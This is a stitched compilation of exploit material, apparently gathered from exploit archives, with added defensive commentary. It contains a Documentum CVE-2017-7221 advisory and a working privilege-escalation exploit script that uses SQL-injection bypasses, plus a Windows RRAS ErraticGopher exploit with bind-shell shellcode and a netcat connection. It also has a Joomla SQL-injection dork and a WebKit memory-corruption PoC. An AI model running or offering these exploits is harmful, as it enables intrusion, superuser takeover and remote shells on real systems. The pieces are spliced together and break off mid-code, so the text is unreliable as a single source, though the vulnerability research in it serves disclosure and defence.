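    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic). Targets mirror the advisory's URLs:
# line 2 carries the payload literally, line 3 URL-encoded once, line 4 encoded twice,
# line 5 hits a path this check does not watch.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Apr/2017:10:01:02 +0000] "GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&LEV_NUM=0&LEV_TYPE0=T0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Apr/2017:10:01:07 +0000] "GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2 HTTP/1.1" 200 640',
    '10.0.0.9 - - [18/Apr/2017:10:01:09 +0000] "GET /OCMPOAM/cdrdispatch?sessionType=25ed6%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E&cmd=ViewActiveCalls HTTP/1.1" 200 640',
    '10.0.0.9 - - [18/Apr/2017:10:01:12 +0000] "GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEV_NAME0=N0fa802%2522%253E%253Cscript%253Ealert(1)%253C%252fscript%253E671a8 HTTP/1.1" 200 640',
    '10.0.0.7 - - [18/Apr/2017:10:02:00 +0000] "GET /other/app?q=%3Cscript%3E HTTP/1.1" 404 0',
]


def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters that carry an XSS marker.

    parse_qsl decodes each value once; the extra unquote_plus catches values that
    were URL-encoded twice. Non-watched paths yield an empty list."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)
        if XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """One finding per log line whose request to a watched servlet carries a marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "params": [name for name, _ in hits],
            })
    return findings


def safe_reflect(value):
    """What the servlet should apply before echoing a parameter inside an attribute:
    HTML-escape including quotes, so '"><script>' stays literal text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("%(ip)s -> %(path)s params=%(params)s" % finding)
```

The second decode in `suspicious_params` is a detection choice so that a doubly-encoded probe is not missed; it says nothing about how the servlet itself decodes. The fix on the server side is `safe_reflect` or the equivalent of the servlet framework's output encoding, applied to every parameter before it is written into the response.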
'''
CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44
Description:
All versions of Documentum Content Server contain the dm_bp_transition docbase
method (a "stored procedure") written in Basic. The implementation of this docbase
method does not properly validate user input, which allows an attacker to execute arbitrary
code with superuser privileges.
The related code snippet is:
==========================================8<========================================
'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
    If (debug = True) Then
        PrintToLog sess, "Run user defined entry criteria."
    End If
    '
    ' researcher comment:
    ' userEntryID parameter is controlled by attacker
    '
    result = RunProcedure(userEntryID, 1, sess, sysID,_
                          user_name, targetState)
End If
...
'
' researcher comment:
' procID parameter is controlled by attacker
'
Function RunProcedure(procID As String, procNo As Integer,_
                      sessID As String, objID As String, userName As String,_
                      targetState As String) As Boolean
    ...
StartIt:
    If (procID <> "0000000000000000") Then
        result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
        '
        ' researcher comment:
        ' here basic interpreter loads content of user-provided script
        ' from underlying repository using following technique:
        '
        ' checking that it is dealing with dm_procedure object
        ' (check was introduced in CVE-2014-2513):
        ' id,c,dm_procedure where r_object_id='procID'
        '
        ' getting content of basic script
        ' fetch,c,procID
        ' getpath,c,l
        '
        result = external(procID)
        If (result = True) Then
            If (procNo = 1) Then
                ' --- Running user-defined entry criteria ---
                result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
                On Error Goto NoFunction
                '
                ' researcher comment
                ' here dmbasic interpreter executes user defined function
                '
                result = EntryCriteria(sessID, objID, userName,_
                                       targetState, errorStack)
                If (result = False) Then
                    errorStack = "[ErrorCode] 1500 [ServerError] " + _
                                 errorStack
                End If
==========================================>8========================================
So, an attacker is able to create their own Basic procedure in the repository and pass its identifier
as an argument to the dm_bp_transition procedure:
==========================================8<========================================
$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."
Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability
==========================================>8========================================
The vendor was notified about this vulnerability in November 2013 through the customer
support channel; after a while the vendor started claiming that this vulnerability
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability. The PoC provided
to CERT/CC was:
==========================================8<========================================
The vendor decided that the root cause of the problem is that users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have the following behavior:
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."
Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."
BUT:
API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)
....
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
==========================================>8========================================
In July 2014 the vendor announced ESA-2014-064, which claimed that the vulnerability had been remediated.
In November 2014 the fix was contested (there was a significant delay after ESA-2014-064 because the vendor
constantly fails to provide the status of reported vulnerabilities) by providing another proof of concept;
the description provided to CERT/CC was:
==========================================8<========================================
I have tried to reproduce the PoC described in VRF#HUFPRMOP and got the following
error:
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"
Such behaviour means that EMC tried to remediate the security issue by
"checking" the object type of the supplied object:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"
API> Bye
bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$
So, the fix was implemented in the dmbasic binary; the problem is that neither the 6.7
SP2 P15 nor the 6.7 SP1 P28 patch contains the dmbasic binary - the first patch
that shipped with the dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because the introduced check can be bypassed
using SQL injection:
~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory
~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
...
(1 row affected)
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
Here "union ..." allows bypassing the check based on the "id" call:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)
API> close,c,q0
...
OK
The comma is required to bypass the error in the fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=
'0801fd08805c9dfe"
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
==========================================>8========================================
In August 2015 the vendor undertook another attempt to remediate this vulnerability;
check ESA-2015-131/CVE-2015-4533 for details.
In August 2015 the fix was contested; check http://seclists.org/bugtraq/2015/Aug/110
for a detailed description - I just demonstrated another attack vector, using the
UNION ALL keyword instead of UNION:
=================================8<================================
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."
New attack vector (note the ALL keyword):
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
=================================>8================================
Recently I have noticed that the latest versions of Documentum Content
Server are not affected by the PoC provided above; however, all versions
of Documentum Content Server are still vulnerable because the vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case,
replace line feed, carriage return and tab characters with a space,
remove double spaces, and after that they check whether the resulting string contains
the special keywords ('union ' and 'union all') or not - it is possible
to use other whitespace characters like backspace, which is demonstrated
in the PoC.
__
Regards,
Andrey B. Panfilov
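The advisory traces two validation strategies that failed in turn: a type check built by interpolating procID into a DQL qualification ("id,c,dm_procedure where r_object_id='procID'"), and a keyword denylist that normalises whitespace before looking for 'union ' and 'union all'. The block below is an added example, not Documentum's code and not the researcher's PoC: it models that denylist from the advisory's description (the exact details of the real implementation are an assumption), shows that a backspace-separated payload passes it, and places a format allowlist for the object ID beside it, which rejects anything that is not a 16-hex-character ID before it can reach the interpolated qualification. The sample arguments are the advisory's own UNION and UNION ALL payloads plus a constructed backspace variant.

```python
"""Model of the dm_bp_transition argument checks from the advisory, and an allowlist that holds."""
import re

# A Documentum object ID is 16 hex characters (the advisory's 0801fd08805c9dfe, 0901d920805929dd).
OBJECT_ID_RE = re.compile(r"[0-9a-f]{16}")


def keyword_denylist_check(argument):
    """Model of the vendor validation the advisory describes (assumed, not the real code):
    lowercase, map CR/LF/TAB to a space, collapse repeated spaces, then reject any
    argument containing 'union ' or 'union all'. Returns True when the argument is accepted."""
    s = argument.lower()
    for ch in "\r\n\t":
        s = s.replace(ch, " ")
    while "  " in s:
        s = s.replace("  ", " ")
    return "union " not in s and "union all" not in s


def object_id_allowlist_check(argument):
    """Accept only a well-formed object ID. Anything else never reaches the
    interpolated qualification, so the shape of the payload does not matter."""
    return OBJECT_ID_RE.fullmatch(argument) is not None


def type_check_qualification(proc_id):
    """Shape of the qualification the advisory says dmbasic builds by string
    interpolation; shown only to make the injection point visible."""
    return "dm_procedure where r_object_id='%s'" % proc_id


def evaluate(argument):
    """Run both checks and report whether the denylist alone lets a non-ID through."""
    denylist = keyword_denylist_check(argument)
    allowlist = object_id_allowlist_check(argument)
    return {
        "denylist_accepts": denylist,
        "allowlist_accepts": allowlist,
        "denylist_bypassed": denylist and not allowlist,
    }


# Constructed sample arguments: a legitimate ID, the advisory's UNION payload, a UNION ALL
# variant separated by a tab (normalised to a space, so caught), and a variant that separates
# 'union' and 'select' with a backspace (\b), which the normalisation never touches.
SAMPLES = {
    "plain_id": "0801fd08805c9dfe",
    "union": "0801fd08805c9dfe,'' union select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe",
    "union_all_tab": "0801fd08805c9dfe,'' UNION\tALL select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe",
    "union_backspace": "0801fd08805c9dfe,'' union\bselect r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe",
}


if __name__ == "__main__":
    for label, argument in SAMPLES.items():
        print(label, evaluate(argument))
```

The denylist fails for the reason the advisory gives: it enumerates separators it knows about, and the interpreter's own tokeniser is happy with ones it does not. The allowlist never has to know what the next bypass looks like, because the only accepted input is one the query can treat as data; the same holds for the `fetch,c,procID` call, which should receive an ID and nothing else.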
CVE-2017-7221.py
'''
#!/usr/bin/env python
import socket
import sys
from os.path import basename
from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)
    (session, docbase) = create_session(*sys.argv[1:5])
    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)
    install_owner = session.serverconfig['r_install_owner']
    document_id = session.next_id(0x08)
    content_id = session.next_id(0x06)
    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")
    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        exit(1)
    data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
           "\nByVal ObjectId As String,_" \
           "\nByVal UserName As String,_" \
           "\nByVal TargetState As String,_" \
           "\nByRef ErrorString As String) As Boolean" \
           "\nDim QueryID As String" \
           "\nDim Query As String" \
           "\nQuery = \"query,c,update dm_user objects set " \
           "user_privileges=16 where user_name=\'%s\'\"" \
           "\nQueryID = dmAPIGet(Query)" \
           "\nQueryID = dmAPIExec(\"commit,c\")" \
           "\nEntryCriteria=True" \
           "\nEnd Function" % (sys.argv[3])
    b = bytearray()
    b.extend(data)
    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"
        exit(1)
    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']
    procedure = False
    try:
        print "Trying to create dm_procedure"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_procedure")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2014-2513")
        document.set_string("r_object_type", "dm_procedure")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if session.sys_obj_save(document_id, document):
            procedure = True
    except Exception, e:
        print str(e)
    if not procedure:
        print "Failed to create dm_procedure"
        print "Trying to create dm_sysobject"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_sysobject")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_string("owner_name", sys.argv[3])
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2017-7221")
        document.set_string("r_object_type", "dm_sysobject")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if not session.sys_obj_save(document_id, document):
            print "Failed to create dm_sysobject"
            exit(1)
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", document_id)
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        exit(1)
    if procedure:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s\" " \
                "0000000000000000 0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 install_owner, session.session)
    else:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s,'' " \
                "union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\" " \
                "0000000000000000 0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 document_id, install_owner, session.session)
    session.query(query)
    r = session.query(
        "select user_privileges from dm_user "
        "where user_name=USER") \
        .next_record()['user_privileges']
    if r != 16:
        print "Failed"
        exit(1)
    print "P0wned!"


def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
        (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
            identity=identity)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                identity=identity,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
        (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True
    return False


if __name__ == '__main__':
    main()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
# By Victor Portal (vportal) for educational purpose only
##################################################################################
# This exploit is the python version of the ErraticGopher exploit, probably      #
# with some modifications. ErraticGopher exploits a memory corruption            #
# (seems to be a Heap Overflow) in the Windows DCE-RPC call MIBEntryGet.         #
# Because of the magic bytes, the application redirects execution to the         #
# iprtrmgr.dll library, where a REP MOVS instruction (0x641194f5) copies         #
# all the injected stub from the heap to the stack, overwriting a return         #
# address as well as the SEH handler stored in the stack, making it possible     #
# to control the execution flow to disable DEP and jump to the shellcode         #
# as SYSTEM user.                                                                #
##################################################################################
# The exploit only works if the target has the RRAS service enabled
# Tested on Windows Server 2003 SP2
import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
target = sys.argv[1]
print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
# Exploit Title: Joomla Component Myportfolio 3.0.2 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba Kazemi (Mojtaba MobhaM)
# Home : https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/myportfolio/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_myportfolio
# Tested on: Linux
# Date: 2017-04-24
# POC :
# pid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?task=project&view=grid&id=1&pid=[SQL]&format=raw&option=com_myportfolio&Itemid=125
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095
There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.
In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:
unsigned newLength = startIndex + otherLength;
If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.
It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented; however, if both arrays involved in the concatenation are of type ArrayWithUndecided, JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.
Arrays of type ArrayWithUndecided are usually of length 0; however, it is possible to create one by calling Array.splice on an array with all undefined elements. This causes an undefined array of the delete length to be allocated and then returned without being written to, which would otherwise cause it to decide its type.
A minimal PoC is as follows, and a full PoC is attached.
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
-->
<html>
<body>
<script>
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
</script>
</body>
</html>
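Added example, not code from the Project Zero report or from WebKit: a C model of the `unsigned newLength = startIndex + otherLength` computation quoted above, walked over the source-array lengths the PoC builds (`this` is b, then 4094 more copies of b, then c, then q) to show exactly where the 32-bit sum wraps, beside a checked variant that refuses the wrapped length. The function names (`checked_new_length`, `find_overflowing_append`, `build_poc_lengths`) are my own; only the lengths come from the PoC.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Mirror of the unsigned addition quoted from JSArray::appendMemcpy. */
static unsigned unchecked_new_length(unsigned startIndex, unsigned otherLength)
{
    return startIndex + otherLength; /* silently wraps modulo 2^32 */
}

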